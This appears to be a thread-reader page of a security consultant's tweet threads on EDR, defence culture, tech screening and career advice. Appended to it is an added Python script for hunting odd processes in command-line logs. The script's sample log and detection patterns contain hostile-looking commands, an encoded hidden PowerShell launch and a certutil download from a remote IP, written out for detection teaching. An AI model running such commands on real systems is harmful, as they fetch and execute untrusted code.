Mick Douglas 🇺🇦🌻
Consultant for InfoSec Innovations | @SANSInstitute Principal Instructor | @IANS_Security Faculty | I like information security. How about you?
Jul 28 20 tweets 4 min read
Buckle up... we need to chat about EDR, MDR, and XDR.

(IDK if I've kicked off a thread about this stuff... though I've participated in plenty.)

Here we go!!

1 EDR = Endpoint Detection & Response.

It is NOT a replacement for anti-virus. It is NOT a replacement for SIEM. In fact, many EDR products do better working with both!

Jun 21 13 tweets 3 min read
You *can* win at defense in cyber security.

Many orgs tell you that if an attacker lands on a system, or takes over a single account, you've "failed".

That's simply not true.

If you believe you have to be perfect to win, buckle up... this is the thread for you!

1 First, let's talk about attacker goals. They're stealing accounts or getting on systems to do something. The goal is to act upon your data in some way. (destroy, alter, etc.)

This is an *important* distinction that many gloss over.

Jun 19 4 tweets 1 min read
I've shared with folks that I grew up poor.

I will forever be confused by the mental gymnastics richer folks go through to convince themselves they're not rich.

Story time:
1 This past weekend my Mrs and I were looking to buy a used sailboat. Here's the exchange:

Me: it's an expensive hobby
Them: yeah, but compared to others it's quite reasonable!
Mrs: Like what?
T: IDK... owning an airplane?

Feb 23 14 tweets 3 min read
Story time:
Once I had a client (CISO) that was hyper insistent that I do "a no holds barred" attack against the C-Suite.

Despite my and the client's legal team's stream of suggestions to NOT do this, the CISO was firm. It must be done to teach a lesson.

Spoiler: plot twist soon!

1 Legal & HR came to me and said the CISO is going to do this. There were other vendors who were pitching this, and I was the most firmly opposed. So they trusted me to not be evil.

Could I do the gig, but not in the way the CISO was expecting?

Feb 23 12 tweets 2 min read
Someone DMed me asking what this was about.

This is a stream of consciousness musing based on a part of a convo I had earlier today.

Let's dig in on what this is and why it's important... assuming NO technical know-how.

1 Attackers use scripts and tools to find weaknesses in web sites & APIs. They pretty much have to because doing things by hand is slow, error prone, and "please kill me now" boring.

The technique I suggest *breaks* attacker automation, and does it in a way that's just... mean.
Jan 31 7 tweets 1 min read
HOLY CRAP. Infosec teams: do you eat your dogfood?

I did this morning. I did NOT like it.

This was eye opening.

1 Late yesterday

Client: mobile device reset is unbelievably burdensome for the users.
me: Let me look into it. I don't see how it would be that big a deal.

ominous music swells

Jan 29 5 tweets 1 min read
Build/config for my NixOS is nearing completion.

Here's some stuff I'm doing... unix/linux folks... what should I add to this?

1 Virtualization stuff:

(I use qemu-utils to convert VMs to qcow2 and am pretty much good to go)

Jan 28 11 tweets 2 min read
An open letter to MSFT Graph API and cmdlet folks.
(please RT for reach)

Most of us who are playing with your Graph API and related PowerShell cmdlets are OK with improvising and figuring things out.

But... you're increasingly making things harder than need be.

1 It seems like the docs you write are targeting the wrong crowd.

We *need* examples.

What you're giving is pages and pages of trivia that *might* be helpful as a reference. maybe.

Jan 4 8 tweets 2 min read
Getting DMs saying I'm wrong on this. Look, score != your role.

If you score well in a tech screen, you pass. If you score poorly you fail. Great scores do not get a more senior offering. If you score perfectly you don't get CTO or whatever.

It doesn't work that way. At all!
1 There is a discretionary zone where you might not be as strong technically as the org is looking to hire, but if you show good "intangibles" you can be hired... yes... even over a more technical person.

Jan 3 14 tweets 2 min read
Got a lot of DMs about a tech screening thread.

Number one issue: a good % of folks don't actually know what a tech screening is. So let's dig in!

1 Yes, a tech screen is to see what the technical competency is of a candidate... but it's more than just that.

If it only were a "can they XYZ?" you'd likely be sent to an online test.

Jan 2 7 tweets 2 min read
Just had my 2nd call today with the client about this.

They asked me to state a few things:
Calling this candidate a "techbro" and "an ass" was out of line. In hindsight, that's more than fair. I shouldn't have put this out so publicly.

1 Client also shared the candidate was told they would get the notes immediately after the call. There was confusion on candidate's part re: "read me your notes".

After review, client found notes to be helpful and insightful.

Jan 2 11 tweets 3 min read
I just hard flunked someone on a tech screening interview.

them: OK let's get this over with, I'm a big deal in this sector of the biz. I know this stuff.
me: um, we're screening tech, but I want to let you know I'll report tone and stuff too

1 Them: why? you're a tech screener, screen for that
me: Then why does my client include a "likability" column in the rating sheet?
T: don't care. I don't need to work with people.
M: huh?
T: I'm a 10x engineer. I don't ever talk with folks

Dec 12, 2022 6 tweets 2 min read
Just got off a phone call with someone.

A regulator ripped up an architecture… And I’m furious.

Before you go any further. This is for a high performance (very very very high volume) site _which will NEVER EVER have proprietary data. EVER.

Let’s look at the complaints…

1 “TLS must be to the destination web server/service”

We designed TLS to terminate at the load balancer. And HTTP to the worker.

Look, I understand MitM attacks. I’ve written tools to do it! But if your threat is an attacker can be between the LB and the WS? Da hell?

Dec 9, 2022 5 tweets 2 min read
Someone DM’ed me and asked “what do you mean Really Big Monitors?”

All SOCs are required to have absurdly large monitors on the walls. They are required to have pew pew visualizations on them at almost all times, but especially when clients or execs come visit the SOC
1 Now I know what you’re wondering… but do the analysts use these monitors? LOL! No. Never. (Maybe in the wee hours they’ll play a movie)

So why have these big monitors? It’s so your SOC is being shown as srrrsly SOCing so goodly. If you don’t have RBM, do you even SOC?
Dec 8, 2022 10 tweets 2 min read
Those just joining infosec or who are early on in your career.

This may shock you, but raw technical skill will be one of the least important skill sets for you.

It's important to develop tech skills, but...
1 In team based orgs (literally every single org), soft skills actually matter far more.

- can you communicate well (both written and verbal)?
- are you nice to work with?
- can you teach yourself?
- can you speak hard truths in a respectful way?
Dec 6, 2022 15 tweets 6 min read
New to Information Security? Not in the industry yet, but want to be?

What will the current crop of AI tools mean for you, a cyber security rookie?

Here’s some of my thoughts… (long thread)

1 [image] That block of text in the first tweet is potent… (I’ve actually saved it and plan on re-reading it periodically)

One thing that rookies need to be KEENLY aware of… There’s going to be an *explosion* of reasonable sounding but flat out wrong advice

2 [image]
Oct 31, 2022 13 tweets 2 min read
This will hurt a lot of feelings so buckle up.

Cyber security is exactly as difficult as your org makes it.

If you have burdensome process, if your machines are overloaded with agents, if you have alert fatigue, etc.

You have a culture problem, not a tech problem.

1 No tech will ever be able to fix that.

Orgs grab for tech because they wrongly think it's the solution to security issues. They hopefully help, but they ALWAYS create new issues.

Oct 30, 2022 20 tweets 4 min read
long (slightly emo) rambling thread.

TL;DR: there's no crisp line between supporting and enabling someone. It's a fuzzy zone.

Sigh... today I may have "lost" an old friend to untreated mental illness. They're still alive but - for now - dead to me.

1 "Joe" is a brilliant fashion designer. Met him thru work when I was a sys admin for a top fashion brand.

His hilarious wit and insane ability to cut and drape fabric so it always flattered (regardless of body type) and mix textures... top notch.

Sep 22, 2022 6 tweets 1 min read
Look folks, MITRE's ATT&CK Matrix is great... but did you know there are firms (and attackers) who do stuff that's not on the matrix?

1 Also, if you really do have 100% coverage, that's great... but please understand that within each technique there's nearly an infinity of options on how to obfuscate or hide.

Sep 14, 2022 12 tweets 3 min read
cyber security isn't important... and that's OK.

This isn't a bleak rant... more a sharing of something I've known for a while... and am now accepting.

If you want your assumptions of cyber security challenged, please read on! 🧵

1 1st, the problem:

In 2015 Harvard Business Review dropped this:

"stock prices during and following the high profile security data breaches... have decreased slightly or quickly recovered following the breach"

Meaning, breaches don't really hurt orgs.

May 23, 2022 15 tweets 3 min read
If defense is hard, you're doing it wrongly.

Last week I wrapped up an interesting coaching type engagement for a defense crew.

I'm not ever going to violate NDAs, but I can share with you some interesting themes.

Let's dig in!
1 Do you have command line logging? Some sort of process monitoring? (most EDRs do!)

Get away from the defaults and just look for odd programs being run. Here are some great resources...
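The "look for odd programs being run" hunt above, as an added example that is not part of the thread and not the author's code: a small Python script that baselines parent/child process pairs from known-good command-line logs, then flags events whose image was never seen before, whose parent is unusual for that image, or whose command line matches a few high-signal patterns (encoded PowerShell, certutil downloads, mshta fetching a remote script). The pipe-delimited log format and every log line in it are constructed for this example; the parse_line function is the only part you would swap for a real source such as Sysmon Event ID 1, auditd EXECVE records, or your EDR's process telemetry.

```python
"""Hunt for odd programs in command-line / process-creation logs.

Added example (not the thread author's code). It assumes a constructed,
pipe-delimited log format:  time|host|user|parent_image|image|command_line
Real sources (Sysmon Event ID 1, auditd EXECVE, EDR process telemetry) need
their own parser, but the hunt logic is the same: baseline what normally
runs, then flag what does not fit.
"""
import re
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    event: ProcEvent
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Case-folded file name, tolerating both Windows and POSIX separators."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed log line; the command line may itself contain '|'."""
    fields = line.rstrip("\n").split("|", 5)
    if len(fields) != 6:
        raise ValueError(f"malformed log line: {line!r}")
    return ProcEvent(*fields)


def build_baseline(lines):
    """Collect (parent, child) pairs and per-image counts from known-good history."""
    pairs, images = set(), Counter()
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        pairs.add((basename(ev.parent), basename(ev.image)))
        images[basename(ev.image)] += 1
    return pairs, images


# A few command-line patterns that are almost never legitimate on workstations.
SUSPICIOUS_CMDLINE = [
    ("encoded powershell", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("certutil download", re.compile(r"certutil(?:\.exe)?\b.*-urlcache", re.I)),
    ("mshta remote script", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I)),
]


def find_odd(lines, baseline):
    """Return a Finding for every event that deviates from the baseline."""
    pairs, images = baseline
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        parent, image = basename(ev.parent), basename(ev.image)
        reasons = []
        if image not in images:
            reasons.append("never-seen image")
        elif (parent, image) not in pairs:
            reasons.append("unusual parent")
        for label, rx in SUSPICIOUS_CMDLINE:
            if rx.search(ev.cmdline):
                reasons.append(f"suspicious command line: {label}")
        if reasons:
            findings.append(Finding(ev, reasons))
    return findings


# Constructed known-good history (one quiet day on two workstations).
BASELINE_LOG = r"""
2022-05-16T08:01:02|ws01|alice|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|"OUTLOOK.EXE"
2022-05-16T08:03:11|ws01|alice|C:\Windows\explorer.exe|C:\Program Files\Google\Chrome\Application\chrome.exe|"chrome.exe"
2022-05-16T08:05:40|ws01|alice|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\alice\q2.docx"
2022-05-16T08:00:00|ws01|SYSTEM|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
2022-05-16T09:12:05|ws02|bob|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|"cmd.exe"
2022-05-16T09:12:30|ws02|bob|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
"""

# Constructed next-day log: two benign events and a macro-style intrusion chain.
HUNT_LOG = r"""
2022-05-17T10:02:14|ws01|alice|C:\Windows\explorer.exe|C:\Program Files\Google\Chrome\Application\chrome.exe|"chrome.exe"
2022-05-17T10:07:51|ws01|alice|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2022-05-17T10:08:03|ws01|alice|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.7/up.dat C:\Users\alice\up.dat
2022-05-17T10:00:00|ws01|SYSTEM|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
"""


def hunt():
    """Run the hunt over the constructed data and return the findings."""
    baseline = build_baseline(BASELINE_LOG.splitlines())
    return find_odd(HUNT_LOG.splitlines(), baseline)


if __name__ == "__main__":
    for f in hunt():
        print(f"{f.event.ts} {f.event.host} {f.event.user}: "
              f"{basename(f.event.parent)} -> {basename(f.event.image)}  [{'; '.join(f.reasons)}]")
        print(f"    {f.event.cmdline}")
```

Run it with python3 and it prints the two odd events (cmd.exe spawned by WINWORD.EXE with an encoded PowerShell payload, then a never-before-seen certutil.exe pulling a file from the network) and stays silent on the chrome and svchost events. The baseline is the whole trick and also the main pitfall: build it from a window you trust, because a baseline collected while an attacker is already active quietly allowlists them, and review the never-seen list by hand before promoting anything into the baseline.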